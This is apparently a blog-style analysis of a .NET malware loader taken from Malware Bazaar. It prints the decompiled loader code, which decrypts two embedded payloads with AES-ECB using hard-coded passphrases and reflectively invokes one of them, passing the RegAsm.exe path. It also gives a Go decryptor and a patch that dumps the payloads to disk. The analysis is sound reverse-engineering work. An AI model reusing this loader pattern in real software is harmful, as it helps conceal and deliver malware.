Analysis: Win32.af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66

I was browsing through Malware Bazaar and came across a Win32 binary that hadn’t been tagged with anything specific, which piqued my interest.

Grabbing the sample revealed a binary with a Flash Player logo, and Detect It Easy identified it as a .NET binary.

I discovered a few interesting things by dropping the binary into dnSpy. The binary was a wrapper for two encrypted binaries bundled in the app’s resources, CLS.dll and Xola.exe.

The app itself is just a really simple SymmetricAlgorithm decrypter that launches the decrypted binaries in a new thread: Main loads the decrypted CLS.dll into the AppDomain, looks up a type and method by their obfuscated names, and invokes that method with the path to RegAsm.exe and the decrypted Xola.exe bytes as arguments.

// Consol.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main()
{
    // Load the decrypted CLS.dll (jjjjjj) into the current AppDomain, resolve the
    // type (tttttt) and static method (kkkk) named by the obfuscated strings, and
    // call it with the RegAsm.exe path (locationstart) and the decrypted Xola.exe
    // bytes (lastcode) as its two arguments.
    Thread.GetDomain().Load(hpCGGsxnBfkpZyTC.jjjjjj).GetType(hpCGGsxnBfkpZyTC.tttttt).GetMethod(hpCGGsxnBfkpZyTC.kkkk).Invoke(null, new object[]
    {
        hpCGGsxnBfkpZyTC.locationstart,
        hpCGGsxnBfkpZyTC.lastcode
    });
}


using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using Consol;
using Microsoft.VisualBasic.CompilerServices;

// Token: 0x02000003 RID: 3
public static class hpCGGsxnBfkpZyTC
{
    // Token: 0x06000003 RID: 3 RVA: 0x000020A8 File Offset: 0x000002A8
    // Decrypts B with the default SymmetricAlgorithm (Rijndael/AES on .NET Framework).
    // The key is SHA-256 of the UTF-16BE encoding of ikey, i.e. 32 bytes, so this is
    // AES-256 in ECB mode with the default PKCS7 padding and no IV.
    public static byte[] syam(byte[] B, string ikey)
    {
        SymmetricAlgorithm symmetricAlgorithm = SymmetricAlgorithm.Create();
        SHA256CryptoServiceProvider sha256CryptoServiceProvider = new SHA256CryptoServiceProvider();
        byte[] key = sha256CryptoServiceProvider.ComputeHash(Encoding.BigEndianUnicode.GetBytes(ikey));
        symmetricAlgorithm.Key = key;
        symmetricAlgorithm.Mode = CipherMode.ECB;
        return symmetricAlgorithm.CreateDecryptor().TransformFinalBlock(B, 0, B.Length);
    }

    // Token: 0x06000004 RID: 4 RVA: 0x000020F4 File Offset: 0x000002F4
    // Reads an embedded manifest resource into memory in one go (the decompiled
    // code ignores the byte count returned by Read).
    public static byte[] ExtractResource(string filename)
    {
        byte[] result;
        using (Stream manifestResourceStream = typeof(Program).Assembly.GetManifestResourceStream(filename))
        {
            if (manifestResourceStream == null)
            {
                result = null;
            }
            else
            {
                byte[] array = new byte[manifestResourceStream.Length];
                manifestResourceStream.Read(array, 0, array.Length);
                result = array;
            }
        }
        return result;
    }

    // Token: 0x04000001 RID: 1
    // Path to RegAsm.exe in the .NET runtime directory; handed to CLS.dll as the first argument.
    public static string locationstart = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe");

    // Token: 0x04000002 RID: 2
    // Xola.exe, decrypted with the passphrase "ZiZ"; handed to CLS.dll as the second argument.
    public static byte[] lastcode = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("Xola.exe"), "ZiZ");

    // Token: 0x04000003 RID: 3
    // CLS.dll, decrypted with the passphrase "جc吉尺O"; this is the assembly Main loads.
    public static byte[] jjjjjj = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("CLS.dll"), "جc吉尺O");

    // Token: 0x04000004 RID: 4
    // Obfuscated full type name inside CLS.dll that Main resolves with GetType().
    public static string tttttt = Conversions.ToString("AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOnTpCiTDfBnyfynAAJxwhxnBJTLsQ.vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph");

    // Token: 0x04000005 RID: 5
    // Obfuscated method name on that type that Main invokes.
    public static string kkkk = "yhxGkJfDMpTfiUkihOywMGfEhwUUQLLMnQOsEBvpnBEZUkExQhTyUQhJwkMJAisikT";
}
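The scheme is simple enough that the resources can be decrypted outside the sample, without patching it and running any of its code. The Go program below is an added example, not code from the post or from the sample: it reimplements syam() (SHA-256 of the UTF-16BE passphrase as an AES-256 key, ECB mode, PKCS7 padding, which are the .NET Framework defaults of SymmetricAlgorithm.Create() apart from the mode) and decrypts a resource blob that has already been saved to disk, finishing with an MZ sanity check. The function names and command-line interface are my own assumptions, and the encryptLikeSample helper exists only to build a constructed blob for exercising the code.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
	"os"
	"unicode/utf16"
)

// Added example; names below are my own, not the sample's.

// utf16BE mirrors Encoding.BigEndianUnicode.GetBytes(): every UTF-16 code unit
// of the passphrase is written big-endian, with no byte-order mark.
func utf16BE(s string) []byte {
	units := utf16.Encode([]rune(s))
	out := make([]byte, 2*len(units))
	for i, u := range units {
		binary.BigEndian.PutUint16(out[2*i:], u)
	}
	return out
}

// keyFromPassphrase mirrors the key derivation in syam(): SHA-256 over the
// UTF-16BE passphrase yields a 32-byte key, so the cipher is AES-256.
func keyFromPassphrase(pass string) []byte {
	sum := sha256.Sum256(utf16BE(pass))
	return sum[:]
}

// decryptResource reimplements syam(): AES-256-ECB (no IV) with PKCS7 padding.
// Each 16-byte block is decrypted independently; the padding is then validated
// and stripped, which also rejects most wrong passphrases.
func decryptResource(ct []byte, pass string) ([]byte, error) {
	block, err := aes.NewCipher(keyFromPassphrase(pass))
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(ct) == 0 || len(ct)%bs != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), bs)
	}
	pt := make([]byte, len(ct))
	for off := 0; off < len(ct); off += bs {
		block.Decrypt(pt[off:off+bs], ct[off:off+bs])
	}
	n := int(pt[len(pt)-1])
	if n == 0 || n > bs || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("invalid PKCS7 padding: wrong passphrase or wrong scheme")
	}
	return pt[:len(pt)-n], nil
}

// looksLikePE is the sanity check worth running on the output: both payloads
// are expected to be PE files, so the plaintext should start with "MZ".
func looksLikePE(b []byte) bool {
	return len(b) >= 2 && b[0] == 'M' && b[1] == 'Z'
}

// encryptLikeSample is the inverse of decryptResource and exists only so the
// example can be exercised on a constructed blob without the real sample.
func encryptLikeSample(pt []byte, pass string) []byte {
	block, _ := aes.NewCipher(keyFromPassphrase(pass))
	bs := block.BlockSize()
	pad := bs - len(pt)%bs
	padded := append(append([]byte{}, pt...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	for off := 0; off < len(padded); off += bs {
		block.Encrypt(ct[off:off+bs], padded[off:off+bs])
	}
	return ct
}

// Usage: decrypt <resource-dump> <passphrase> <output>, where <resource-dump> is
// the raw embedded resource saved from the sample and <passphrase> is the one
// paired with it in the decompiled code ("ZiZ" for Xola.exe, "جc吉尺O" for CLS.dll).
func main() {
	if len(os.Args) != 4 {
		fmt.Fprintln(os.Stderr, "usage: decrypt <resource-dump> <passphrase> <output>")
		os.Exit(2)
	}
	ct, err := os.ReadFile(os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	pt, err := decryptResource(ct, os.Args[2])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if !looksLikePE(pt) {
		fmt.Fprintln(os.Stderr, "warning: output does not start with MZ")
	}
	if err := os.WriteFile(os.Args[3], pt, 0o644); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Printf("wrote %d bytes to %s\n", len(pt), os.Args[3])
}
```

It assumes the raw resources were first saved out of the sample (dnSpy's resource view can save them) and that each is paired with its passphrase from the decompiled code. Because ECB needs no IV and the PKCS7 check fails for nearly every wrong key, a clean decrypt that starts with MZ is good evidence the scheme was reproduced faithfully; the same routine can be reused on later samples from the same family if only the passphrases change.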

To keep things super simple and easy, I’m going to modify the hpCGGsxnBfkpZyTC class to include a dump() function that will simply write the two binaries to disk.

// Writes the already-decrypted bytes to C:\Temp (the directory must exist).
public static void dump(string fileName, byte[] bytes)
{
    File.WriteAllBytes("C:\\Temp\\" + fileName, bytes);
}

Then I modify the entry point so it dumps the two binaries instead of running them:

using System;

namespace Consol
{
    // Token: 0x02000002 RID: 2
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        private static void Main()
        {
            hpCGGsxnBfkpZyTC.dump("CLS.dll", hpCGGsxnBfkpZyTC.jjjjjj);
            hpCGGsxnBfkpZyTC.dump("Xola.exe", hpCGGsxnBfkpZyTC.lastcode);
        }
    }
}

The result? Two freshly decrypted malware samples in C:\Temp.

I’ll dig into the two binaries in a part 2 sometime, but for now I’ll leave it there 🙂


References

https://bazaar.abuse.ch/sample/af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66/

CLS.dll - https://www.virustotal.com/gui/file/5026b4d5a20d9bd7f07f111adbfdcdffa3423e83a1f5a982c1c34ad610eaa678/details
Xola.exe - https://www.virustotal.com/gui/file/f5e53da9273368bd53d088d573088865f80a318e9839a54214584c3eb98de003/details